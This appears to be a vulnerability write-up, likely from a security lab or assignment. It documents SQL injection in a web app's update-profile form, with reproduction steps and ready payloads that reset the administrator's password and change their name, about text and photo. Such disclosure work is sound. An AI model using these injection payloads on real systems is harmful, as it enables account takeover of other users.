# Vulnerability 1: SQL Injection in update profile form allows changing password, name, photo and about info of another user

- Vulnerability: SQL Injection
- Where:  `about`, `name`, `newpassword` and `photo` fields
- Impact: Allows to change any user's information, except for their username[^1]

**Note:** When we refer to the `photo` field, we mean the name of the uploaded file, that will go on the `photo` field

## Steps to reproduce

To change only password:
1. Register a user
2. Go to `Profile(name)`
3. Insert logged user's password on `currentpassword` field
4. Insert `', password='123', username='administrator' WHERE username='administrator' #` and submit
5. Logout
6. Login with username `administrator` and password `123`

[(POC)](vuln1.py)

## Other payloads

- `', name='not the admin', username='administrator' WHERE username='administrator' #`
- `', about='PWNED', username='administrator' WHERE username='administrator' #`
- `', photo='not-the-default-user.jpg', username='administrator' WHERE username='administrator' #`

**Note 1:** The above parameters can be combined in one single payload, the mandatory part is `username='usernametochange' WHERE username='usernametochange' #`

**Note 2:** Some payloads may not work in all fields

[^1]: We can only change the username if the user hasn't created any posts and has no friends or friend requests
